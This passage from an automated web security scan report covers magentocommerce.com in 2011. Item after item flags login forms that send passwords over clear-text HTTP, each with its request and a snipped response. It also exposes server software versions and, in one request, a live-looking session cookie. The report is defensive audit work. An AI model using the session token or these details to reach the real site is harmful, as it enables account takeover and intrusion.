Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.28. http://www.magentocommerce.com/company/press-releases

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.29. http://www.magentocommerce.com/company/press-releases/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.30. http://www.magentocommerce.com/company/privacy

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.31. http://www.magentocommerce.com/company/terms

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.32. http://www.magentocommerce.com/de

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.33. http://www.magentocommerce.com/demo

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.34. http://www.magentocommerce.com/design_guide

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.35. http://www.magentocommerce.com/dk

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.36. http://www.magentocommerce.com/download

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.37. http://www.magentocommerce.com/download/diff

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.38. http://www.magentocommerce.com/download/login_form

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...
</div>
<form action="http://www.magentocommerce.com/products/customer/account/loginPost/" method="post">
<input type="hidden" name="return_url" value="http://www.magentocommerce.com/download" />
...[SNIP]...
<dd><input type="password" id="fVal_password" class="fValidate['required'] input-text" name="login[password]" size="20" value="" maxlength="32" /></dd>
...[SNIP]...

2.39. http://www.magentocommerce.com/download/release_notes

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.40. http://www.magentocommerce.com/es

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.41. http://www.magentocommerce.com/fr

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
